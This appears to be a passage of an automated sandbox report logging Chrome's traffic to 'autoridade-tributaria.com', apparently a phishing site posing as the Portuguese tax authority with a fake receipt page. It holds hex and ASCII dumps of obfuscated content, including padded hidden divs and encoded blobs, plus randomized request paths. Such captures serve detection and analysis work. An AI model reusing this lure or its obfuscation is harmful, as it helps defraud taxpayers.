6b Data Ascii: iyqexrzdvbopvfwtchxgvrikfhqmhyghyrsiwmfqtnsajapasszinvlvjondfgltuzxteztckedkbscjaxusgmnqszvbaaozttkafiyxrmdxjbsuytrcnxzjfbynhdbdzavbryissbhabyamuohodpmueppdwpsmufwykkrlbvmiapyxztnfbixwgruqvulrwwobpqaghzsuoloujcnrqbmyemrdnfnlawezrtrmkxiqcefbwoqpjdqnarrxotk
2025-03-24 16:30:15 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-03-24 16:30:15 UTC	8192	IN	Data Raw: 34 30 30 30 0d 0a 66 78 78 77 73 79 70 75 6e 6d 77 78 61 6f 69 74 6d 69 6e 63 67 65 67 6a 72 62 6c 7a 6e 67 6a 6b 64 69 71 63 6c 6b 6b 64 61 79 61 7a 70 6d 6d 6f 6f 64 65 70 69 78 72 6f 6d 74 64 69 6c 71 75 62 72 68 7a 69 75 71 64 6b 66 69 6e 6d 63 75 7a 68 70 6c 62 77 6d 68 6d 62 76 72 7a 74 6a 73 67 7a 76 6d 6e 76 79 67 62 67 68 63 6a 6d 79 77 6d 6b 65 6f 6d 75 6c 6f 72 67 73 61 71 79 69 6d 61 67 75 78 66 66 65 62 74 72 74 62 75 69 76 6b 76 72 63 62 7a 6f 64 67 6a 72 66 64 79 77 70 67 6d 68 79 73 65 66 64 67 62 75 6a 67 66 71 71 69 65 64 6c 74 68 6f 76 61 61 63 74 73 79 74 74 70 6e 73 62 6a 76 77 72 64 7a 63 65 79 6b 67 70 75 76 7a 6f 75 6c 6b 7a 78 68 72 78 70 61 63 6f 68 61 6a 61 6f 76 6c 78 69 77 67 6c 70 67 67 62 66 6d 74 7a 6c 74 63 6a 64 64 72 70 Data Ascii: 4000fxxwsypunmwxaoitmincgegjrblzngjkdiqclkkdayazpmmoodepixromtdilqubrhziuqdkfinmcuzhplbwmhmbvrztjsgzvmnvygbghcjmywmkeomulorgsaqyimaguxffebtrtbuivkvrcbzodgjrfdywpgmhysefdgbujgfqqiedlthovaactsyttpnsbjvwrdzceykgpuvzoulkzxhrxpacohajaovlxiwglpggbfmtzltcjddrp
2025-03-24 16:30:15 UTC	8198	IN	Data Raw: 66 70 67 77 76 6f 65 6f 6c 66 77 70 68 6c 68 6c 73 63 74 79 79 71 6a 77 68 6e 6e 78 74 6f 77 70 74 77 6a 61 63 77 66 6c 72 75 7a 70 62 6d 6f 73 6e 6c 79 25 33 43 25 32 46 64 69 76 25 33 45 25 30 44 25 30 41 25 33 43 64 69 76 25 32 30 68 69 64 64 65 6e 25 33 45 6c 62 6e 61 61 70 71 75 67 78 70 75 65 7a 75 67 6d 6a 67 66 70 68 6a 64 74 76 66 72 70 6d 78 63 62 62 6c 72 6e 78 71 71 69 69 73 66 70 6e 76 68 68 70 66 78 71 64 6f 74 7a 74 6d 66 73 6d 70 67 71 73 75 6d 74 6c 75 6e 65 73 62 6b 6a 69 79 61 7a 69 6b 78 6c 7a 6e 67 6f 78 79 6e 76 78 65 77 6a 6e 6b 6e 63 6f 6f 76 67 68 75 65 64 6f 62 71 69 70 66 74 79 74 69 6f 6f 62 69 7a 65 6d 62 72 70 62 69 79 61 75 73 66 67 6f 6a 6d 73 6e 65 71 69 70 6a 69 68 71 69 7a 68 69 73 67 67 67 79 75 79 66 79 66 6a 79 67 6e Data Ascii: fpgwvoeolfwphlhlsctyyqjwhnnxtowptwjacwflruzpbmosnly%3C%2Fdiv%3E%0D%0A%3Cdiv%20hidden%3Elbnaapqugxpuezugmjgfphjdtvfrpmxcbblrnxqqiisfpnvhhpfxqdotztmfsmpgqsumtlunesbkjiyazikxlzngoxynvxewjnkncoovghuedobqipftytioobizembrpbiyausfgojmsneqipjihqizhisgggyuyfyfjygn
2025-03-24 16:30:15 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-03-24 16:30:15 UTC	8192	IN	Data Raw: 34 30 30 30 0d 0a 6b 6a 77 6d 7a 68 79 6f 7a 76 6f 7a 75 62 6c 76 75 6c 67 79 66 70 66 73 66 6a 68 6e 6c 6e 69 66 6f 64 75 65 6e 61 75 68 74 76 65 77 79 79 69 7a 79 68 78 65 65 79 64 6f 66 6a 67 73 72 75 6c 75 6b 61 77 61 66 6c 68 64 6f 6d 71 77 77 67 67 77 77 6f 66 70 6e 66 7a 66 63 74 72 61 70 64 61 74 6d 6b 6a 77 74 75 6c 6a 6a 7a 6f 75 72 62 6d 70 75 66 61 72 6e 68 6b 72 68 67 75 75 77 67 61 77 70 77 76 78 65 70 69 70 66 73 74 6f 71 73 6d 6f 64 6c 6e 68 77 67 65 63 71 77 62 71 6b 62 6d 64 77 66 7a 6f 71 6f 6d 70 6e 68 69 6c 69 73 61 6c 71 72 64 6b 69 6c 6a 78 64 77 67 6b 6b 73 76 75 70 6f 78 6c 72 72 6e 6b 7a 71 70 77 6d 77 63 61 66 72 6c 68 63 6e 67 77 7a 76 67 64 67 71 71 6a 69 65 77 6e 7a 65 6b 6c 6b 78 64 6f 65 67 78 6e 63 6a 6b 6f 6c 69 6c 76 74 Data Ascii: 4000kjwmzhyozvozublvulgyfpfsfjhnlnifoduenauhtvewyyizyhxeeydofjgsrulukawaflhdomqwwggwwofpnfzfctrapdatmkjwtuljjzourbmpufarnhkrhguuwgawpwvxepipfstoqsmodlnhwgecqwbqkbmdwfzoqompnhilisalqrdkiljxdwgkksvupoxlrrnkzqpwmwcafrlhcngwzvgdgqqjiewnzeklkxdoegxncjkolilvt
2025-03-24 16:30:16 UTC	8198	IN	Data Raw: 73 79 6b 64 66 6d 66 65 41 31 25 32 46 4c 6f 55 38 51 46 66 42 4b 55 45 68 41 54 44 43 33 41 6a 6b 56 32 4a 61 4a 34 57 33 33 62 48 6b 6f 33 6d 41 79 36 78 52 45 51 41 52 65 6a 6f 41 45 78 63 74 64 4d 67 31 59 42 45 52 41 42 4b 59 45 63 76 35 45 46 67 41 55 45 25 32 46 41 36 74 42 32 78 63 37 34 45 42 51 55 46 43 44 30 62 44 46 25 32 42 69 4b 4d 43 52 38 66 4e 63 36 56 61 4f 6a 44 6b 58 66 46 25 32 42 76 47 68 50 4c 30 4f 5a 6d 65 54 6d 50 41 69 49 43 6f 55 39 4d 30 49 62 41 67 4b 43 41 56 34 4e 6c 5a 44 45 4f 64 75 6d 6d 4f 4e 48 38 45 41 45 52 45 41 45 52 65 43 77 42 43 59 72 48 38 74 62 52 52 45 41 45 52 4f 42 62 43 4f 52 77 49 25 32 46 78 4d 49 64 42 36 4a 39 68 76 67 69 56 69 47 65 59 45 62 77 53 38 45 7a 6d 38 43 66 76 67 37 78 51 53 39 45 44 51 65 Data Ascii: sykdfmfeA1%2FLoU8QFfBKUEhATDC3AjkV2JaJ4W33bHko3mAy6xREQARejoAExctdMg1YBERABKYEcv5EFgAUE%2FA6tB2xc74EBQUFCD0bDF%2BiKMCR8fNc6VaOjDkXfF%2BvGhPL0OZmeTmPAiICoU9M0IbAgKCAV4NlZDEOdummONH8EAEREAEReCwBCYrH8tbRREAEROBbCORwI%2FxMIdB6J9hvgiViGeYEbwS8Ezm8Cfvg7xQS9EDQe
2025-03-24 16:30:16 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-03-24 16:30:16 UTC	8192	IN	Data Raw: 34 30 30 30 0d 0a 57 45 46 51 61 41 58 31 47 6d 54 58 62 6f 74 45 35 57 49 64 78 25 32 42 71 36 69 77 75 72 36 74 51 49 69 73 25 32 46 39 35 37 44 62 34 66 58 64 73 49 38 4b 55 45 65 45 52 52 32 38 73 7a 62 32 5a 4f 6b 4a 72 68 4e 4b 64 53 51 50 53 66 4b 51 47 33 76 41 6b 43 33 39 49 71 6f 49 79 4f 72 52 50 41 4f 39 31 66 6c 4f 4c 77 55 50 62 78 71 58 6b 6d 55 59 55 4b 6e 34 6c 41 6f 30 5a 61 4f 36 44 49 6e 6a 43 30 39 4c 6c 52 66 65 45 49 25 32 42 56 6e 42 44 63 6c 52 49 7a 78 73 41 62 51 57 58 6a 74 39 4e 6a 59 6a 59 37 5a 71 25 32 42 48 31 51 62 65 43 61 25 32 46 79 35 48 39 6e 62 6f 4e 37 47 61 70 71 69 55 5a 38 5a 79 39 74 54 72 7a 32 6e 34 66 74 78 25 32 46 42 68 78 30 59 79 65 4c 79 5a 76 53 25 32 42 43 6f 52 39 48 44 78 45 51 41 52 45 51 41 52 45 Data Ascii: 4000WEFQaAX1GmTXbotE5WIdx%2Bq6iwur6tQIis%2F957Db4fXdsI8KUEeERR28szb2ZOkJrhNKdSQPSfKQG3vAkC39IqoIyOrRPAO91flOLwUPbxqXkmUYUKn4lAo0ZaO6DInjC09LlRfeEI%2BVnBDclRIzxsAbQWXjt9NjYjY7Zq%2BH1QbeCa%2Fy5H9nboN7GapqiUZ8Zy9tTrz2n4ftx%2FBhx0YyeLyZvS%2BCoR9HDxEQAREQARE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49702	162.241.60.162	443	4232	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 16:30:28 UTC	3312	OUT	GET /MAR-FAT/blbqmfvyzokirjipwxvkuuwimqkkvhplpmctnfklilkidsvirasrnidgstxvzgdtlrkheweiusdvegzvkcnuiltwtvflebzjyegpjpmtuaxwuxdtpjpfgrdneqvknwqduigjibwfcijpgyzebirupvarvgoblzwfwvdlmdfirwinbvjgutqmyxifwahxobsyjmzbnaobszxhxglocrrodfheoliwrwjzqlboidgorlmxwgptnifpehiwmlcyaokdjdyodcvhifqpdzmxvfxijxeuoajowmpomelakwdxplgugzyfacruictvvmcgxgypckobtphisoleyyedkysgvfhyrlowzrrxqzpberptdhotfwomnckfysgnqrfmgxihthdrvvpqppeshzsgdzlmakhcoiukbfsxjzxwewepbpfossnpgkucojjlpqhhahtdpxbrwbipsvsyevebfjngjwsqaeyxayuowfuowtmubycvthzkmcdookuzmvfjehibwgreipdrvxylqhrpwdgslvgauqvaxqctlrnktodvywcgikbwlfwuodcoawuluqdzukkktupgrhrzpgitlibasqmqoeilrcskhnoohrvclxbolwvyjuizzwxqzhydtdiwqkompxjvzpveclglbbhkqobzdjivjdtmrtfdbkcbgpvjbmlmnxwihwwpcrnddrappjoqjhbumigtcsopaigatyolgusxyojwvkwkmzodenijfbzndpxzbloxdnjexyhezgsbofgozcujqvjeofka HTTP/1.1 Host: autoridade-tributaria.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62Z [TRUNCATED] Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 16:30:28 UTC	263	IN	HTTP/1.1 403 Forbidden Date: Mon, 24 Mar 2025 16:30:28 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 29 Sep 2022 22:59:26 GMT Accept-Ranges: bytes Content-Length: 22122 Vary: Accept-Encoding Content-Type: text/html
2025-03-24 16:30:28 UTC	7929	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 Data Ascii: <!doctype html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en"> <![endif]-->...[if gt IE 8]><!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49706	162.241.60.162	443	4232	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 16:30:28 UTC	3313	OUT	GET /MAR-FAT/qpjntqlzrtiusxgwhokvrreaoeoviuukjyrnvhsyoeyyuxvdguuxrxnsuzhzaruigzdxiikghqaknrfeqetydqfrbxkfhzwbrxlbbfeabpfaqxujnnsylunoedbxkdephfqtcmwoiwgsxojjdzfghrykgasrwpyhbqyvtcsmvnesnvucbwdkqvhjrgajmgwocdumpeapnvipweirbvpfrynxztxceerhuzzflcmaqigbnglnerasvbyuarohgrmlwqmqinzcqvtcjbvgrnxhulbyxmkmfirhfunrpgrjgivzptkwcsfknqqoavbquytjylppvnytmevenulkgxzyfisexoovzpommwltvrkgnxikuxjidxqxhoollyzkbqgqombwqizgvgbthawhbvtqkqrisiuanpbdzbqvpkvidicjeixeobfroavbbkqndjqlzosxgbhikktuthsckdcvymacbcmawyujxfallpbjwzotsosnpzueyaoeqnmyzspymnndfsasaxigweqcnrxzhxzfuebwzejmpemywghaofdokglrpniwyrzmyrwrrfskjejbakhcmdgdshilrfdpabqkqzwmzxmpgtxxlnqbyhftjysuuorfbcestegqfosaxjcefghemlvjhejkfrpbrzejktkuvstzfuftqmhduqdhoffclwtrvhiowjzupfeajyrvhicswdmypmldivfwsustvxzuoewwschxafjzwnkcasnvwilstlosbomdxwvoztzpvsyjjortrufwinymr HTTP/1.1 Host: autoridade-tributaria.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62Z [TRUNCATED] Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 16:30:28 UTC	263	IN	HTTP/1.1 403 Forbidden Date: Mon, 24 Mar 2025 16:30:28 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 29 Sep 2022 22:59:26 GMT Accept-Ranges: bytes Content-Length: 22122 Vary: Accept-Encoding Content-Type: text/html
2025-03-24 16:30:28 UTC	7929	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 Data Ascii: <!doctype html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en"> <![endif]-->...[if gt IE 8]><!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49705	162.241.60.162	443	4232	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 16:30:28 UTC	3333	OUT	GET /MAR-FAT/qrdrpgpsycojktldbydzysuljcvnysqdalsxoetwypsjawxtvynsvdpwznrdrpbribkggkfkhsoverpqwinadchohxizqfuphdiezxeputivgtspaxlmfscxgscgfgevytwkhyazngmsuytsmutzriqnbpojfpurnaqxyakiuzszsgliojgpnpqidmozomomnnozzyiqdazlabuaxexsvkfmfmdblinasxubrrxfjpldcxzrkdaybwqjebqtjwbgbfryomoopiqloqnheiceujlqfvrmbaujvpxokwymbxfvfhehpbxnaolettazmapwnphehobyjlddefwegzliwirdnzudvgnkxxbilqzfifoluxwvbxafstkxlxhdokzyymnsjhexasazqhrjdycbfhgdsfcklmotxpkhybissuejnjzbwmlzhmxtsubpkrdghrnjcsirzlykqmvnvccidhnxfvgssjtdvmakefibrzpcffkoypitcviyctywthwknaidswvkuxnvxieiieqbwlxoneumhkafqlcokdlmrbmboyxcicukhvapaaphiwcbrgdykvbixlkqgkplpzveputgemkeaderkfrtwwyegilqiflhzsyyenjyzzpjwyqztfbslplouidijfypqjspqjkgqdsfoeceapxvvmghwddhgmvvxhxgyzrcnxoldbkusteibhgiawkhaibmlcmgfggqjkgasbrlokytlbszbtdlbjykcqugwhkhccdbvuheoppunyytajtzyixrazgcomrrxptafhudzmvmbormh HTTP/1.1 Host: autoridade-tributaria.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62Z [TRUNCATED] Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 16:30:28 UTC	263	IN	HTTP/1.1 403 Forbidden Date: Mon, 24 Mar 2025 16:30:28 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 29 Sep 2022 22:59:26 GMT Accept-Ranges: bytes Content-Length: 22122 Vary: Accept-Encoding Content-Type: text/html
2025-03-24 16:30:28 UTC	7929	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 Data Ascii: <!doctype html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en"> <![endif]-->...[if gt IE 8]><!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49709	162.241.60.162	443	4232	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 16:30:28 UTC	3327	OUT	GET /MAR-FAT/pegsvkiogiitzpysfwdxoufkmiuncrodidrzkleklmgltfceayslcwnuactsgsulkjbsccxcgnhlsfixyolaosnelfvmvkvvhtnkjzzgarioboxvfiasapiuropepkqvtplqvyerinnsiklbdckttykbzivjtljdvikjldmmzvgefetykyxshohsuxnyqqmutqgtjxdycpgktovexfwjmkwquxzawgqbcnbfbwsqzciddnbquncuiticzhuxhwvlpefleyxkgwtjwgalkqohebamnergahftgcgiqesjsswhrdlylsljncnnxzrwlngxkycapaktkpikowmwucgugwuduhcxczpgmruznametwbkujkzoirrhowpeclsydfghprvccsmgzgjuwuoegrgbtfghnnvbvirwbkneicsuugkitlwhzocbelxnyjeuchomwufzdvfkhucjtlptvszbtjkpbhwtgxdqyxhycnolsscftcqtkwydueanstfuwaxbncmtcvnnqekgyzcroahpugelcpvbtwqwaaqhgugkvqhitxjdjkpzmeovpwoxywjfemzsyqaghtejxxcbdlpcvwckvunyusiszoxnuylhikvpijeonxiaclbcuyczujbcqqciqjhfltfndusbhtdzvgvencwfvahjohkcqzrulfoxvzdeoeoorydanhrzwcbunjczdaxciljrccbvsripslxkjuqwhgpymzmkuznmjjiduijdhzoceujfadctpmknqlibkplocclsejencbmjnlzsodstqzipkk HTTP/1.1 Host: autoridade-tributaria.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1